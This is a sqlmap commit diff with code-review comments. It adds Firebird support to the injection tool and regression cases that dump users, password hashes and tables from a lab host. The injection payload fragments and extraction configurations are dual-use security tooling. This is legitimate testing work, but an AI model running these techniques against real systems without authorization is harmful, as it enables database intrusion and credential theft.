Merge branch 'master' of github.com:sqlmapproject/sqlmap

Miroslav Stampar 2013-01-19 18:28:52 +01:00
commit 3f4c010370
14 changed files with 669 additions and 35 deletions


@ -26,7 +26,7 @@ SMTP_SERVER = "127.0.0.1"
SMTP_PORT = 25
SMTP_TIMEOUT = 30
FROM = "regressiontest@sqlmap.org"
TO = "dev@sqlmap.org"
TO = ["bernardo.damele@gmail.com", "miroslav.stampar@gmail.com"]
SUBJECT = "Regression test results on %s using revision %s" % (TIME, REVISION)
def prepare_email(content):
@ -87,18 +87,23 @@ def main():
test_counts.append(test_count)
console_output_fd = codecs.open(os.path.join(output_folder, "console_output"), "rb", "utf8")
console_output_file = os.path.join(output_folder, "console_output")
log_file = os.path.join(output_folder, "debiandev", "log")
traceback_file = os.path.join(output_folder, "traceback")
if os.path.exists(console_output_file):
console_output_fd = codecs.open(console_output_file, "rb", "utf8")
console_output = console_output_fd.read()
console_output_fd.close()
attachments[test_count] = str(console_output)
log_fd = codecs.open(os.path.join(output_folder, "debiandev", "log"), "rb", "utf8")
if os.path.exists(log_file):
log_fd = codecs.open(log_file, "rb", "utf8")
log = log_fd.read()
log_fd.close()
if traceback:
traceback_fd = codecs.open(os.path.join(output_folder, "traceback"), "rb", "utf8")
if os.path.exists(traceback_file):
traceback_fd = codecs.open(traceback_file, "rb", "utf8")
traceback = traceback_fd.read()
traceback_fd.close()
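Review bot: When `console_output_file` or `log_file` is absent, the new `os.path.exists` branches skip the assignment, so `console_output` and `log` stay unbound for the rest of that iteration unless they are initialised earlier in main() (outside the hunk), and a NameError there aborts the whole run rather than marking one case; initialise them next to the path variables, `console_output = log = None`, and let the report code tolerate None. The handles are still opened and closed by hand; `with codecs.open(log_file, "rb", "utf8") as log_fd: log = log_fd.read()` also closes them when `read()` raises. Separately, `TO` changed from a string to a list at the top of the file; if `prepare_email` assigns it straight to the `To` header it now needs `", ".join(TO)`.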


@ -6,9 +6,18 @@
SQLMAP_HOME="/opt/sqlmap"
REGRESSION_SCRIPT="${SQLMAP_HOME}/extra/shutils"
FROM="regressiontest@sqlmap.org"
TO="bernardo.damele@gmail.com, miroslav.stampar@gmail.com"
SUBJECT="Automated regression test failed on $(date)"
cd $SQLMAP_HOME
git pull
rm -f output 2>/dev/null
cd $REGRESSION_SCRIPT
python regressiontest.py
python regressiontest.py 1>/tmp/regressiontest.log 2>&1
if [ $? -ne 0 ]
then
cat /tmp/regressiontest.log | mailx -s "${SUBJECT}" -aFrom:${FROM} ${TO}
fi
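Review bot: `/tmp/regressiontest.log` is a fixed, predictable name in a shared directory, so the `1>` redirect follows whatever file or symlink another local account has already placed there, and two overlapping runs clobber each other's output; write to a private temporary file instead, `LOG=$(mktemp)`, use `"$LOG"` in the redirect and the `cat`, and remove it after mailing. Neither `cd` nor `git pull` is checked, so if `$SQLMAP_HOME` is unavailable the script runs `python regressiontest.py` from the wrong directory and mails a spurious failure; `set -e` at the top, or `cd "$SQLMAP_HOME" || exit 1`, avoids that. `${TO}` is deliberately unquoted so the comma-separated list reaches mailx as two words; a comment saying so would stop someone "fixing" the quoting.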


@ -535,7 +535,7 @@ class Agent(object):
elif fieldsNoSelect:
concatenatedQuery = "CONCAT('%s',%s,'%s')" % (kb.chars.start, concatenatedQuery, kb.chars.stop)
elif Backend.getIdentifiedDbms() in (DBMS.PGSQL, DBMS.ORACLE, DBMS.SQLITE, DBMS.DB2):
elif Backend.getIdentifiedDbms() in (DBMS.PGSQL, DBMS.ORACLE, DBMS.SQLITE, DBMS.DB2, DBMS.FIREBIRD):
if fieldsExists:
concatenatedQuery = concatenatedQuery.replace("SELECT ", "'%s'||" % kb.chars.start, 1)
concatenatedQuery += "||'%s'" % kb.chars.stop
@ -822,8 +822,7 @@ class Agent(object):
limitedQuery += " %s" % limitStr
elif Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.DB2):
if " ORDER BY " in limitedQuery and "(SELECT " in limitedQuery:
orderBy = limitedQuery[limitedQuery.index(" ORDER BY "):]
if " ORDER BY " in limitedQuery and "SELECT " in limitedQuery:
limitedQuery = limitedQuery[:limitedQuery.index(" ORDER BY ")]
if query.startswith("SELECT "):
@ -831,6 +830,7 @@ class Agent(object):
limitedQuery = "%s FROM (%s,%s" % (untilFrom, untilFrom.replace(delimiter, ','), limitStr)
else:
limitedQuery = "%s FROM (SELECT %s,%s" % (untilFrom, ','.join(f for f in field), limitStr)
limitedQuery = limitedQuery % fromFrom
limitedQuery += "=%d" % (num + 1)
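Review bot: `limitedQuery = limitedQuery % fromFrom` re-parses the whole query as a format string, so any literal `%` in the fields part (a `LIKE '%x%'` or a `'%'` literal in a user-supplied --sql-query) raises a ValueError/TypeError instead of producing a query; substituting only the placeholder that `limitStr` contributes, `limitedQuery = limitedQuery.replace("%s", fromFrom, 1)`, avoids that. The relaxed guard `" ORDER BY " in limitedQuery and "SELECT " in limitedQuery` is now true for practically any SELECT, and `limitedQuery[:limitedQuery.index(" ORDER BY ")]` cuts at the first occurrence, so an ORDER BY inside a parenthesised subquery would also drop the text after it, including the subquery's closing parenthesis; if that shape can reach here, the cut should be limited to a trailing top-level ORDER BY. The enclosing method starts and ends outside the hunk.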


@ -175,6 +175,7 @@ class Dump(object):
for setting in settings:
self._write(" %s: %s" % (subHeader, setting))
if userSettings:
self.singleString("")
def dbs(self, dbs):


@ -167,6 +167,9 @@ def liveTest():
result = runCase(switches, parse)
test_case_fd = codecs.open(os.path.join(paths.SQLMAP_OUTPUT_PATH, "test_case"), "wb", UNICODE_ENCODING)
test_case_fd.write("%s\n" % name)
if result:
logger.info("test passed")
cleanCase()
@ -183,6 +186,7 @@ def liveTest():
errMsg += " - SQL injection not detected"
logger.error(errMsg)
test_case_fd.write("%s\n" % errMsg)
if failedParseOn:
console_output_fd = codecs.open(os.path.join(paths.SQLMAP_OUTPUT_PATH, "console_output"), "wb", UNICODE_ENCODING)
@ -199,6 +203,7 @@ def liveTest():
if conf.stopFail is True:
return retVal
test_case_fd.close()
retVal &= bool(result)
dataToStdout("\n")
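Review bot: The `return retVal` under `if conf.stopFail is True` now sits between the writes to `test_case_fd` and its `close()`, so on the stop-on-failure path the handle is left to the interpreter's finaliser rather than closed explicitly; close it before returning, or wrap the per-case body in `with codecs.open(os.path.join(paths.SQLMAP_OUTPUT_PATH, "test_case"), "wb", UNICODE_ENCODING) as test_case_fd:`. If `cleanCase()`, called right after the pass-path write, removes `paths.SQLMAP_OUTPUT_PATH`, the still-open `test_case` file is deleted underneath the handle, so confirm the ordering against that helper. liveTest() starts and ends outside the hunk.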


@ -23,6 +23,7 @@ from lib.core.common import incrementCounter
from lib.core.common import initTechnique
from lib.core.common import isListLike
from lib.core.common import isNumPosStrValue
from lib.core.common import isTechniqueAvailable
from lib.core.common import listToStrValue
from lib.core.common import readInput
from lib.core.common import unArrayizeValue
@ -34,6 +35,7 @@ from lib.core.data import logger
from lib.core.data import queries
from lib.core.dicts import FROM_DUMMY_TABLE
from lib.core.enums import DBMS
from lib.core.enums import PAYLOAD
from lib.core.settings import CHECK_ZERO_COLUMNS_THRESHOLD
from lib.core.settings import MYSQL_ERROR_CHUNK_LENGTH
from lib.core.settings import MSSQL_ERROR_CHUNK_LENGTH
@ -180,6 +182,9 @@ def _errorFields(expression, expressionFields, expressionFieldsList, num=None, e
else:
expressionReplaced = expression.replace(expressionFields, field, 1)
if kb.technique == PAYLOAD.TECHNIQUE.QUERY and Backend.isDbms(DBMS.FIREBIRD) and expressionReplaced.startswith("SELECT "):
expressionReplaced = "SELECT %s" % agent.concatQuery(expressionReplaced)
output = NULL if emptyFields and field in emptyFields else _oneShotErrorUse(expressionReplaced, field)
if not kb.threadContinue:
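Review bot: The new Firebird wrap is keyed on `expressionReplaced.startswith("SELECT ")`, a case-sensitive test, so a lower-case `select` in a user-supplied --sql-query would skip `agent.concatQuery` and the extraction would silently run on the unwrapped expression; use `expressionReplaced.upper().startswith("SELECT ")` unless expressions are normalised to upper case before `_errorFields` (outside the hunk). `isTechniqueAvailable` is added to the import block but no use of it appears in the visible hunks; drop it or confirm it is used further down. The three-way condition also deserves a why-comment, e.g. `# inline queries (technique Q) on Firebird: wrap the SELECT with the delimiter markers via concatQuery`.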


@ -74,6 +74,7 @@ class Fingerprint(GenericFingerprint):
("1.5", ("NULLIF(%d,%d) IS NULL", "EXISTS(SELECT CURRENT_TRANSACTION FROM RDB$DATABASE)")),
("2.0", ("EXISTS(SELECT CURRENT_TIME(0) FROM RDB$DATABASE)", "BIT_LENGTH(%d)>0", "CHAR_LENGTH(%d)>0")),
("2.1", ("BIN_XOR(%d,%d)=0", "PI()>0.%d", "RAND()<1.%d", "FLOOR(1.%d)>=0")),
# TODO: add test for Firebird 2.5
)
for i in xrange(len(table)):
@ -122,7 +123,7 @@ class Fingerprint(GenericFingerprint):
logger.info(infoMsg)
randInt = randomInt()
result = inject.checkBooleanExpression("EXISTS(SELECT * FROM RDB$DATABASE WHERE %d=%d)" % (randInt, randInt))
result = inject.checkBooleanExpression("(SELECT COUNT(*) FROM RDB$DATABASE WHERE %d=%d)>0" % (randInt, randInt))
if result:
infoMsg = "confirming %s" % DBMS.FIREBIRD
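Review bot: The replacement of `EXISTS(SELECT * FROM RDB$DATABASE WHERE %d=%d)` with `(SELECT COUNT(*) FROM RDB$DATABASE WHERE %d=%d)>0` is not explained, and since `randInt` is compared with itself the expression is a tautology whose only job is to be valid Firebird syntax in the injected context; a one-line comment giving the reason EXISTS() was dropped (e.g. that it is not accepted as a standalone boolean there, if that is the cause) would save the next reader a trip through the history. The version table still stops at 2.1 (the new TODO at the top of the hunk says as much) while the regression cases in this same commit expect a `2.5.0` banner next to an active fingerprint of 2.1, so that TODO should be tracked rather than left inline.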


@ -16,6 +16,9 @@ class Syntax(GenericSyntax):
@staticmethod
def escape(expression, quote=True):
if isDBMSVersionAtLeast('2.1'):
if expression == u"'''":
return "ASCII_CHAR(%d)" % (ord("'"))
if quote:
while True:
index = expression.find("'")
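Review bot: The early return for `expression == u"'''"` runs before the `quote` check, so it applies for `quote=False` callers too, and it handles only that exact three-character value while the generic loop below (which continues outside the hunk) deals with quotes inside longer strings; a short comment is needed to explain why this one value bypasses the loop, e.g. `# a value that is only an escaped quote (''') presumably can't be rebuilt by the loop below; emit ASCII_CHAR(39) directly - confirm`. `ord("'")` is a constant, so `"ASCII_CHAR(39)"` with that comment reads cleaner than a call on every invocation.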


@ -41,7 +41,7 @@ class Connector(GenericConnector):
try:
self.connector = pymssql.connect(host="%s:%d" % (self.hostname, self.port), user=self.user, password=self.password, database=self.db, login_timeout=conf.timeout, timeout=conf.timeout)
except pymssql.OperationalError, msg:
except (pymssql.InterfaceError, pymssql.OperationalError), msg:
raise SqlmapConnectionException(msg)
self.initCursor()


@ -513,22 +513,24 @@ class Databases:
query = rootQuery.inband.query % (unsafeSQLIdentificatorNaming(tbl), unsafeSQLIdentificatorNaming(conf.db))
query += condQuery
elif Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.DB2):
query = rootQuery.inband.query % unsafeSQLIdentificatorNaming(tbl.upper())
query = rootQuery.inband.query % (unsafeSQLIdentificatorNaming(tbl.upper()), unsafeSQLIdentificatorNaming(conf.db.upper()))
query += condQuery
elif Backend.isDbms(DBMS.MSSQL):
query = rootQuery.inband.query % (conf.db, conf.db, conf.db, conf.db,
conf.db, conf.db, conf.db, unsafeSQLIdentificatorNaming(tbl).split(".")[-1])
query += condQuery.replace("[DB]", conf.db)
elif Backend.isDbms(DBMS.SQLITE):
elif Backend.getIdentifiedDbms() in (DBMS.SQLITE, DBMS.FIREBIRD):
query = rootQuery.inband.query % tbl
values = inject.getValue(query, blind=False, time=False)
if Backend.isDbms(DBMS.MSSQL) and isNoneValue(values):
index, values = 1, []
while True:
query = rootQuery.inband.query2 % (conf.db, tbl, index)
value = unArrayizeValue(inject.getValue(query, blind=False, time=False))
if isNoneValue(value) or value == " ":
break
else:
@ -591,7 +593,7 @@ class Databases:
query += condQuery
elif Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.DB2):
query = rootQuery.blind.count % unsafeSQLIdentificatorNaming(tbl.upper())
query = rootQuery.blind.count % (unsafeSQLIdentificatorNaming(tbl.upper()), unsafeSQLIdentificatorNaming(conf.db.upper()))
query += condQuery
elif Backend.isDbms(DBMS.MSSQL):
@ -639,7 +641,7 @@ class Databases:
query += condQuery
field = None
elif Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.DB2):
query = rootQuery.blind.query % unsafeSQLIdentificatorNaming(tbl.upper())
query = rootQuery.blind.query % (unsafeSQLIdentificatorNaming(tbl.upper()), unsafeSQLIdentificatorNaming(conf.db.upper()))
query += condQuery
field = None
elif Backend.isDbms(DBMS.MSSQL):
@ -659,7 +661,7 @@ class Databases:
if Backend.getIdentifiedDbms() in (DBMS.MYSQL, DBMS.PGSQL):
query = rootQuery.blind.query2 % (unsafeSQLIdentificatorNaming(tbl), column, unsafeSQLIdentificatorNaming(conf.db))
elif Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.DB2):
query = rootQuery.blind.query2 % (unsafeSQLIdentificatorNaming(tbl.upper()), column)
query = rootQuery.blind.query2 % (unsafeSQLIdentificatorNaming(tbl.upper()), column, unsafeSQLIdentificatorNaming(conf.db.upper()))
elif Backend.isDbms(DBMS.MSSQL):
query = rootQuery.blind.query2 % (conf.db, conf.db, conf.db, conf.db, column, conf.db,
conf.db, conf.db, unsafeSQLIdentificatorNaming(tbl).split(".")[-1])
@ -736,7 +738,11 @@ class Databases:
db = db.upper()
table = table.upper()
if Backend.getIdentifiedDbms() in (DBMS.SQLITE, DBMS.ACCESS, DBMS.FIREBIRD):
query = "SELECT %s FROM %s" % (queries[Backend.getIdentifiedDbms()].count.query % '*', safeSQLIdentificatorNaming(table, True))
else:
query = "SELECT %s FROM %s.%s" % (queries[Backend.getIdentifiedDbms()].count.query % '*', safeSQLIdentificatorNaming(db), safeSQLIdentificatorNaming(table, True))
count = inject.getValue(query, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS)
if isNumPosStrValue(count):
@ -759,7 +765,7 @@ class Databases:
if not conf.db:
conf.db, conf.tbl = conf.tbl.split(".")
if conf.tbl is not None and conf.db is None:
if conf.tbl is not None and conf.db is None and Backend.getIdentifiedDbms() not in (DBMS.SQLITE, DBMS.ACCESS, DBMS.FIREBIRD):
warnMsg = "missing database parameter. sqlmap is going to "
warnMsg += "use the current database to retrieve the "
warnMsg += "number of entries for table '%s'" % unsafeSQLIdentificatorNaming(conf.tbl)
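Review bot: The Oracle/DB2 branches now format `rootQuery.inband.query`, `blind.count`, `blind.query` and `blind.query2` with a 2-tuple containing `conf.db.upper()`; if `conf.db` can still be None when these run (the count path in the last hunk only warns about a missing database for non-SQLite/Access/Firebird backends), `.upper()` raises AttributeError before any query is built, so either guard it or confirm `conf.db` is resolved to the current schema earlier in the method, outside the hunk. The same branch serves DB2, whose queries.xml entries are not among the visible sections of this commit; unless the DB2 column queries also gained a second `%s` (the Oracle ones did, `... AND OWNER='%s'`), formatting with a 2-tuple raises `TypeError: not all arguments converted`. The enclosing methods start and end outside the hunks.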


@ -29,6 +29,7 @@ from lib.core.enums import PAYLOAD
from lib.core.exception import SqlmapMissingMandatoryOptionException
from lib.core.exception import SqlmapUserQuitException
from lib.core.settings import CURRENT_DB
from lib.core.settings import METADB_SUFFIX
from lib.request import inject
from lib.techniques.brute.use import columnExists
from lib.techniques.brute.use import tableExists
@ -199,7 +200,7 @@ class Search:
if isinstance(values, basestring):
values = [values]
for value in values:
newValues.append(["SQLite_masterdb", value])
newValues.append(["SQLite_%s" % METADB_SUFFIX, value])
values = newValues
@ -258,7 +259,7 @@ class Search:
if tblConsider == "2":
continue
else:
foundTbls["SQLite_masterdb"] = []
foundTbls["SQLite_%s" % METADB_SUFFIX] = []
for db in foundTbls.keys():
db = safeSQLIdentificatorNaming(db)
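Review bot: The metadata database name is assembled twice as `"SQLite_%s" % METADB_SUFFIX`, once per hunk; building it once at module level, `SQLITE_METADB = "SQLite_%s" % METADB_SUFFIX`, keeps the two call sites from drifting apart, which is the kind of mismatch the move away from the hard-coded `SQLite_masterdb` is meant to prevent. The regression expectations in this commit still match on the literal `SQLite_masterdb`/`Firebird_masterdb`, so that literal and `METADB_SUFFIX` now have to be kept in step by hand.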


@ -888,6 +888,217 @@
<item value="r'Database: SQLite_masterdb.+Table: users.+5 entries.+luther.+nameisnull.+'"/>
</parse>
</case>
<case name="Firebird boolean-based multi-threaded enumeration - all entries">
<switches>
<url value="http://debiandev/sqlmap/firebird/get_int.php?id=1"/>
<threads value="4"/>
<tech value="B"/>
<extensiveFp value="True"/>
<getBanner value="True"/>
<getCurrentUser value="True"/>
<getCurrentDb value="True"/>
<getHostname value="True"/>
<isDba value="True"/>
<getUsers value="True"/>
<getPasswordHashes value="True"/>
<getPrivileges value="True"/>
<getRoles value="True"/>
<getDbs value="True"/>
<getTables value="True"/>
<getColumns value="True"/>
<getCount value="True"/>
<dumpTable value="True"/>
<tbl value="users"/>
<excludeSysDbs value="True"/>
</switches>
<parse>
<item value="Title: AND boolean-based blind - WHERE or HAVING clause"/>
<item value="r'back-end DBMS: active fingerprint: Firebird 2.1 \(dialect 3\)'"/>
<item value="banner: '2.5.0'"/>
<item value="current user: 'SYSDBA'"/>
<item value="r'current database: '/'"/>
<item value="current user is DBA: True"/>
<item value="r'database management system users \[.+PUBLIC.+SYSDBA'"/>
<item value="r'database management system users privileges:.+PUBLIC.+privilege: SELECT.+SYSDBA.+privilege: DELETE.+privilege: UPDATE'"/>
<item value="r'database management system users roles:.+PUBLIC.+role: SELECT.+SYSDBA.+role: DELETE.+role: UPDATE'"/>
<item value="r'Database: Firebird_masterdb.+1 table.+USERS'"/>
<item value="r'Database: Firebird_masterdb.+Table: USERS.+3 columns.+SURNAME.+VARCHAR'"/>
<item value="r'Database: Firebird_masterdb.+Table.+Entries.+USERS.+5'"/>
<item value="r'Database: Firebird_masterdb.+Table: USERS.+5 entries.+luther.+nameisnull.+'"/>
</parse>
</case>
<!-- TODO: this test case fails because of issue #358 -->
<case name="Firebird error-based multi-threaded enumeration - all entries">
<switches>
<url value="http://debiandev/sqlmap/firebird/get_int.php?id=1"/>
<threads value="4"/>
<tech value="E"/>
<extensiveFp value="True"/>
<getBanner value="True"/>
<getCurrentUser value="True"/>
<getCurrentDb value="True"/>
<getHostname value="True"/>
<isDba value="True"/>
<getUsers value="True"/>
<getPasswordHashes value="True"/>
<getPrivileges value="True"/>
<getRoles value="True"/>
<getDbs value="True"/>
<getTables value="True"/>
<getColumns value="True"/>
<getCount value="True"/>
<dumpTable value="True"/>
<tbl value="users"/>
</switches>
<parse>
<item value="Title: AND boolean-based blind - WHERE or HAVING clause"/>
<item value="r'back-end DBMS: active fingerprint: Firebird 2.1 \(dialect 3\)'"/>
<item value="banner: '2.5.0'"/>
<item value="current user: 'SYSDBA'"/>
<item value="r'current database: '/'"/>
<item value="current user is DBA: True"/>
<item value="r'database management system users \[.+PUBLIC.+SYSDBA'"/>
<item value="r'database management system users privileges:.+PUBLIC.+privilege: SELECT.+SYSDBA.+privilege: DELETE.+privilege: UPDATE'"/>
<item value="r'database management system users roles:.+PUBLIC.+role: SELECT.+SYSDBA.+role: DELETE.+role: UPDATE'"/>
<item value="r'Database: Firebird_masterdb.+1 table.+USERS'"/>
<item value="r'Database: Firebird_masterdb.+Table: USERS.+3 columns.+SURNAME.+VARCHAR'"/>
<item value="r'Database: Firebird_masterdb.+Table.+Entries.+USERS.+5'"/>
<item value="r'Database: Firebird_masterdb.+Table: USERS.+5 entries.+luther.+nameisnull.+'"/>
</parse>
</case>
<!-- TODO: this test case fails because of issue #357 -->
<case name="Firebird UNION query multi-threaded enumeration - all entries">
<switches>
<url value="http://debiandev/sqlmap/firebird/get_int.php?id=1"/>
<threads value="4"/>
<tech value="U"/>
<extensiveFp value="True"/>
<getBanner value="True"/>
<getCurrentUser value="True"/>
<getCurrentDb value="True"/>
<getHostname value="True"/>
<isDba value="True"/>
<getUsers value="True"/>
<getPasswordHashes value="True"/>
<getPrivileges value="True"/>
<getRoles value="True"/>
<getDbs value="True"/>
<getTables value="True"/>
<getColumns value="True"/>
<getCount value="True"/>
<dumpTable value="True"/>
<tbl value="users"/>
</switches>
<parse>
<item value="Title: Generic UNION query (NULL) - 3 columns"/>
<item value="r'back-end DBMS: active fingerprint: Firebird 2.1 \(dialect 3\)'"/>
<item value="banner: '2.5.0'"/>
<item value="current user: 'SYSDBA'"/>
<item value="r'current database: '/'"/>
<item value="current user is DBA: True"/>
<item value="r'database management system users \[.+PUBLIC.+SYSDBA'"/>
<item value="r'database management system users privileges:.+PUBLIC.+privilege: SELECT.+SYSDBA.+privilege: DELETE.+privilege: UPDATE'"/>
<item value="r'database management system users roles:.+PUBLIC.+role: SELECT.+SYSDBA.+role: DELETE.+role: UPDATE'"/>
<item value="r'Database: Firebird_masterdb.+1 table.+USERS'"/>
<item value="r'Database: Firebird_masterdb.+Table: USERS.+3 columns.+SURNAME.+VARCHAR'"/>
<item value="r'Database: Firebird_masterdb.+Table.+Entries.+USERS.+5'"/>
<item value="r'Database: Firebird_masterdb.+Table: USERS.+5 entries.+luther.+nameisnull.+'"/>
</parse>
</case>
<!-- TODO: this test case fails because of issue #357 -->
<case name="Firebird partial UNION query multi-threaded enumeration - all entries">
<switches>
<url value="http://debiandev/sqlmap/firebird/get_int_partialunion.php?id=1"/>
<threads value="4"/>
<tech value="U"/>
<extensiveFp value="True"/>
<getBanner value="True"/>
<getCurrentUser value="True"/>
<getCurrentDb value="True"/>
<getHostname value="True"/>
<isDba value="True"/>
<getUsers value="True"/>
<getPasswordHashes value="True"/>
<getPrivileges value="True"/>
<getRoles value="True"/>
<getDbs value="True"/>
<getTables value="True"/>
<getColumns value="True"/>
<getCount value="True"/>
<dumpTable value="True"/>
<tbl value="users"/>
</switches>
<parse>
<item value="Title: Generic UNION query (NULL) - 3 columns"/>
<item value="r'back-end DBMS: active fingerprint: Firebird 2.1 \(dialect 3\)'"/>
<item value="banner: '2.5.0'"/>
<item value="current user: 'SYSDBA'"/>
<item value="r'current database: '/'"/>
<item value="current user is DBA: True"/>
<item value="r'database management system users \[.+PUBLIC.+SYSDBA'"/>
<item value="r'database management system users privileges:.+PUBLIC.+privilege: SELECT.+SYSDBA.+privilege: DELETE.+privilege: UPDATE'"/>
<item value="r'database management system users roles:.+PUBLIC.+role: SELECT.+SYSDBA.+role: DELETE.+role: UPDATE'"/>
<item value="r'Database: Firebird_masterdb.+1 table.+USERS'"/>
<item value="r'Database: Firebird_masterdb.+Table: USERS.+3 columns.+SURNAME.+VARCHAR'"/>
<item value="r'Database: Firebird_masterdb.+Table.+Entries.+USERS.+5'"/>
<item value="r'Database: Firebird_masterdb.+Table: USERS.+5 entries.+luther.+nameisnull.+'"/>
</parse>
</case>
<case name="Firebird time-based single-threaded enumeration - all entries">
<switches>
<url value="http://debiandev/sqlmap/firebird/get_int_nooutput.php?id=1"/>
<tech value="T"/>
<level value="4"/>
<risk value="2"/>
<timeSec value="2"/>
<getBanner value="True"/>
<isDba value="True"/>
</switches>
<parse>
<item value="Title: Firebird AND time-based blind (heavy query)"/>
<item value="banner: '2.5.0'"/>
<item value="current user is DBA: True"/>
</parse>
</case>
<case name="Firebird inline queries multi-threaded enumeration - all entries">
<switches>
<url value="http://debiandev/sqlmap/firebird/get_int_inline.php?id=1"/>
<threads value="4"/>
<tech value="Q"/>
<level value="2"/>
<extensiveFp value="True"/>
<getBanner value="True"/>
<getCurrentUser value="True"/>
<getCurrentDb value="True"/>
<getHostname value="True"/>
<isDba value="True"/>
<getUsers value="True"/>
<getPasswordHashes value="True"/>
<getPrivileges value="True"/>
<getRoles value="True"/>
<getDbs value="True"/>
<getTables value="True"/>
<getColumns value="True"/>
<getCount value="True"/>
<dumpTable value="True"/>
<tbl value="users"/>
</switches>
<parse>
<item value="Title: Firebird inline queries"/>
<item value="r'back-end DBMS: active fingerprint: Firebird 2.1 \(dialect 3\)'"/>
<item value="banner: '2.5.0'"/>
<item value="current user: 'SYSDBA'"/>
<item value="r'current database: '/'"/>
<item value="current user is DBA: True"/>
<item value="r'database management system users \[.+PUBLIC.+SYSDBA'"/>
<item value="r'database management system users privileges:.+PUBLIC.+privilege: SELECT.+SYSDBA.+privilege: DELETE.+privilege: UPDATE'"/>
<item value="r'database management system users roles:.+PUBLIC.+role: SELECT.+SYSDBA.+role: DELETE.+role: UPDATE'"/>
<item value="r'Database: Firebird_masterdb.+1 table.+USERS'"/>
<item value="r'Database: Firebird_masterdb.+Table: USERS.+3 columns.+SURNAME.+VARCHAR'"/>
<item value="r'Database: Firebird_masterdb.+Table.+Entries.+USERS.+5'"/>
<item value="r'Database: Firebird_masterdb.+Table: USERS.+5 entries.+luther.+nameisnull.+'"/>
</parse>
</case>
<!-- End of common enumeration switches across all techniques -->
<!-- Custom enumeration switches -->
@ -1044,6 +1255,21 @@
<item value="r'Database: SYS.+Table: USERS.+5 entries.+the | iss.+&lt;blank&gt; | mei'"/>
</parse>
</case>
<case name="IBM DB2 boolean-based multi-threaded custom enumeration - substring">
<switches>
<url value="http://debiandev/sqlmap/db2/get_int.php?id=1"/>
<threads value="4"/>
<tech value="B"/>
<dumpTable value="True"/>
<db value="db2inst1"/>
<tbl value="users"/>
<firstChar value="3"/>
<lastChar value="5"/>
</switches>
<parse>
<item value="r'Database: DB2INST1.+Table: USERS.+5 entries.+the | iss.+NULL | mei'"/>
</parse>
</case>
<case name="SQLite UNION query multi-threaded custom enumeration">
<switches>
<url value="http://debiandev/sqlmap/sqlite/get_int.php?id=1"/>
@ -1671,6 +1897,294 @@
<item value="r'Database: information_schema.+Table: sql_parts.+1 column.+feature_name.+character_data'"/>
</parse>
</case>
<case name="Oracle boolean-based multi-threaded search enumeration - database">
<switches>
<url value="http://debiandev/sqlmap/oracle/get_int.php?id=1"/>
<threads value="4"/>
<tech value="B"/>
<search value="True"/>
<db value="sys"/>
</switches>
<parse>
<item value="r'found databases.+:.+\[\*\] CTXSYS.+\[\*\] SYS.+\[\*\] TSMSYS'"/>
</parse>
</case>
<case name="Oracle error-based multi-threaded search enumeration - database">
<switches>
<url value="http://debiandev/sqlmap/oracle/get_int.php?id=1"/>
<threads value="4"/>
<tech value="E"/>
<search value="True"/>
<db value="sys"/>
</switches>
<parse>
<item value="r'found databases.+:.+\[\*\] CTXSYS.+\[\*\] SYS.+\[\*\] TSMSYS'"/>
</parse>
</case>
<case name="Oracle UNION query multi-threaded search enumeration - database">
<switches>
<url value="http://debiandev/sqlmap/oracle/get_int.php?id=1"/>
<threads value="4"/>
<tech value="U"/>
<search value="True"/>
<db value="sys"/>
</switches>
<parse>
<item value="r'found databases.+:.+\[\*\] CTXSYS.+\[\*\] SYS.+\[\*\] TSMSYS'"/>
</parse>
</case>
<case name="Oracle boolean-based multi-threaded search enumeration - tables given database">
<switches>
<url value="http://debiandev/sqlmap/oracle/get_int.php?id=1"/>
<threads value="4"/>
<tech value="B"/>
<search value="True"/>
<db value="sys"/>
<tbl value="user,aux,wrong"/>
<answer value="do you want to dump tables=N,do you want to crack them via a dictionary-based attack=N"/>
</switches>
<parse>
<item value="r'Database: SYS.+9 tables.+AUX_STATS.+USERS.+AUX_HISTORY'"/>
</parse>
</case>
<case name="Oracle error-based multi-threaded search enumeration - tables given database">
<switches>
<url value="http://debiandev/sqlmap/oracle/get_int.php?id=1"/>
<threads value="4"/>
<tech value="E"/>
<search value="True"/>
<db value="sys"/>
<tbl value="user,aux,wrong"/>
<answer value="do you want to crack them via a dictionary-based attack=N"/>
</switches>
<parse>
<item value="r'Database: SYS.+9 tables.+AUX_STATS.+USERS.+AUX_HISTORY'"/>
<item value="r'.+5 entries.+wu.+nameisnull'"/>
</parse>
</case>
<case name="Oracle UNION query multi-threaded search enumeration - tables given database">
<switches>
<url value="http://debiandev/sqlmap/oracle/get_int.php?id=1"/>
<threads value="4"/>
<tech value="U"/>
<search value="True"/>
<db value="sys"/>
<tbl value="user,aux,wrong"/>
<answer value="do you want to crack them via a dictionary-based attack=N"/>
</switches>
<parse>
<item value="r'Database: SYS.+9 tables.+AUX_STATS.+USERS.+AUX_HISTORY'"/>
<item value="r'.+5 entries.+wu.+nameisnull'"/>
</parse>
</case>
<case name="Oracle boolean-based multi-threaded search enumeration - tables without given database">
<switches>
<url value="http://debiandev/sqlmap/oracle/get_int.php?id=1"/>
<threads value="4"/>
<tech value="B"/>
<search value="True"/>
<tbl value="users"/>
<answers value="do you want to dump=N"/>
</switches>
<parse>
<item value="r'Database: SYS.+1 table.+USERS.+Database: FLOWS_020100.+2 table.+WWV_FLOW_PICK_END_USERS'"/>
</parse>
</case>
<case name="Oracle error-based multi-threaded search enumeration - tables without given database">
<switches>
<url value="http://debiandev/sqlmap/oracle/get_int.php?id=1"/>
<threads value="4"/>
<tech value="E"/>
<search value="True"/>
<tbl value="users"/>
<answers value="do you want to dump=N"/>
</switches>
<parse>
<item value="r'Database: SYS.+1 table.+USERS.+Database: FLOWS_020100.+2 table.+WWV_FLOW_PICK_END_USERS'"/>
</parse>
</case>
<case name="Oracle UNION query multi-threaded search enumeration - tables without given database">
<switches>
<url value="http://debiandev/sqlmap/oracle/get_int.php?id=1"/>
<threads value="4"/>
<tech value="U"/>
<search value="True"/>
<tbl value="users"/>
<answers value="do you want to dump=N"/>
</switches>
<parse>
<item value="r'Database: SYS.+1 table.+USERS.+Database: FLOWS_020100.+2 table.+WWV_FLOW_PICK_END_USERS'"/>
</parse>
</case>
<case name="Oracle boolean-based multi-threaded search enumeration - column without given db or table">
<switches>
<url value="http://debiandev/sqlmap/oracle/get_int.php?id=1"/>
<threads value="4"/>
